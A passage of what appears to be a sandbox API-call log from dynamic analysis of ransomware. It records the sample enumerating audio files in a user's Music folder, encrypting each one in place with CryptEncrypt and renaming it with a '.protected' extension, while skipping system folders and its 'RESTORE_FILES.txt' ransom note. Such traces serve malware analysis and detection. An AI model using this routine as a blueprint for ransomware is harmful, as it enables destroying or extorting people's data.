pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3") returned 111 [0092.306] StrStrIW (lpFirst="b4anS5I7R0HxUA.mp3", lpSrch=".protected") returned 0x0 [0092.306] lstrcmpW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.306] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.306] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\b4ans5i7r0hxua.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3") returned 111 [0092.306] StrStrW (lpFirst="b4anS5I7R0HxUA.mp3", lpSrch=".txt") returned 0x0 [0092.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3") returned 111 [0092.306] StrStrW (lpFirst="b4anS5I7R0HxUA.mp3", lpSrch=".rar") returned 0x0 [0092.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3") returned 111 [0092.306] StrStrW (lpFirst="b4anS5I7R0HxUA.mp3", lpSrch=".zip") returned 0x0 [0092.306] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0xa72, lpOverlapped=0x0) returned 1 [0092.307] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff58e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.307] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xa72, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0xa72, lpOverlapped=0x0) returned 1 [0092.307] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.307] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.307] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.307] CloseHandle (hObject=0x14c) returned 1 [0092.307] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3.protected") returned 121 [0092.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\b4ans5i7r0hxua.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\b4anS5I7R0HxUA.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\b4ans5i7r0hxua.mp3.protected")) returned 1 [0092.308] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="Windows") returned -1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="Program Files") returned -1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="Program Files (x86)") returned -1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="$Recycle.bin") returned 1 [0092.308] lstrcmpiW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="System Volume Information") returned -1 [0092.308] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3") returned 117 [0092.308] StrStrIW (lpFirst="CqEOO vwmmgKIbdKawC0.mp3", lpSrch=".protected") returned 0x0 [0092.308] lstrcmpW (lpString1="CqEOO vwmmgKIbdKawC0.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.308] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.308] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\cqeoo vwmmgkibdkawc0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3") returned 117 [0092.309] StrStrW (lpFirst="CqEOO vwmmgKIbdKawC0.mp3", lpSrch=".txt") returned 0x0 [0092.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3") returned 117 [0092.309] StrStrW (lpFirst="CqEOO vwmmgKIbdKawC0.mp3", lpSrch=".rar") returned 0x0 [0092.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3") returned 117 [0092.309] StrStrW (lpFirst="CqEOO vwmmgKIbdKawC0.mp3", lpSrch=".zip") returned 0x0 [0092.309] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.310] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.310] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.310] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.310] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.310] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.310] CloseHandle (hObject=0x14c) returned 1 [0092.310] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3.protected") returned 127 [0092.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\cqeoo vwmmgkibdkawc0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\CqEOO vwmmgKIbdKawC0.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\cqeoo vwmmgkibdkawc0.mp3.protected")) returned 1 [0092.311] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="Windows") returned -1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="Program Files") returned -1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="Program Files (x86)") returned -1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="$Recycle.bin") returned 1 [0092.311] lstrcmpiW (lpString1="DgeJFKIe.m4a", lpString2="System Volume Information") returned -1 [0092.311] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a") returned 105 [0092.311] StrStrIW (lpFirst="DgeJFKIe.m4a", lpSrch=".protected") returned 0x0 [0092.311] lstrcmpW (lpString1="DgeJFKIe.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0092.311] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.311] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\dgejfkie.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a") returned 105 
[0092.311] StrStrW (lpFirst="DgeJFKIe.m4a", lpSrch=".txt") returned 0x0 [0092.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a") returned 105 [0092.311] StrStrW (lpFirst="DgeJFKIe.m4a", lpSrch=".rar") returned 0x0 [0092.312] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a") returned 105 [0092.312] StrStrW (lpFirst="DgeJFKIe.m4a", lpSrch=".zip") returned 0x0 [0092.312] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.312] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.312] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.312] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.312] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.312] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.312] CloseHandle (hObject=0x14c) returned 1 [0092.313] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a.protected") returned 115 [0092.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\dgejfkie.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\DgeJFKIe.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\dgejfkie.m4a.protected")) returned 1 [0092.313] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="Windows") returned -1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="Program Files") returned -1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="Program Files (x86)") returned -1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="$Recycle.bin") returned 1 [0092.313] lstrcmpiW (lpString1="faR8rvBC.wav", lpString2="System Volume Information") returned -1 [0092.313] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav") returned 105 [0092.313] StrStrIW (lpFirst="faR8rvBC.wav", lpSrch=".protected") returned 0x0 [0092.313] lstrcmpW (lpString1="faR8rvBC.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.313] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.313] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.313] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\far8rvbc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav") returned 105 [0092.314] StrStrW (lpFirst="faR8rvBC.wav", lpSrch=".txt") returned 0x0 [0092.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav") returned 105 [0092.314] StrStrW (lpFirst="faR8rvBC.wav", lpSrch=".rar") returned 0x0 [0092.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav") returned 105 [0092.314] StrStrW (lpFirst="faR8rvBC.wav", lpSrch=".zip") returned 0x0 [0092.314] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.314] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.314] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.314] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.315] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.315] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.315] CloseHandle (hObject=0x14c) returned 1 [0092.315] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav.protected") returned 115 [0092.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\far8rvbc.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\far8rvbc.wav.protected")) returned 1 [0092.315] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="Windows") returned -1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="Program Files") returned -1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="Program Files (x86)") returned -1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="$Recycle.bin") returned 1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="System Volume Information") returned -1 [0092.315] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a") returned 101 
[0092.315] StrStrIW (lpFirst="k2Qw.m4a", lpSrch=".protected") returned 0x0 [0092.315] lstrcmpW (lpString1="k2Qw.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0092.316] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.316] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k2qw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a") returned 101 [0092.316] StrStrW (lpFirst="k2Qw.m4a", lpSrch=".txt") returned 0x0 [0092.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a") returned 101 [0092.316] StrStrW (lpFirst="k2Qw.m4a", lpSrch=".rar") returned 0x0 [0092.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a") returned 101 [0092.316] StrStrW (lpFirst="k2Qw.m4a", lpSrch=".zip") returned 0x0 [0092.316] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.317] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.317] 
WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.317] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.317] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.317] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.317] CloseHandle (hObject=0x14c) returned 1 [0092.317] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a.protected") returned 111 [0092.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k2qw.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 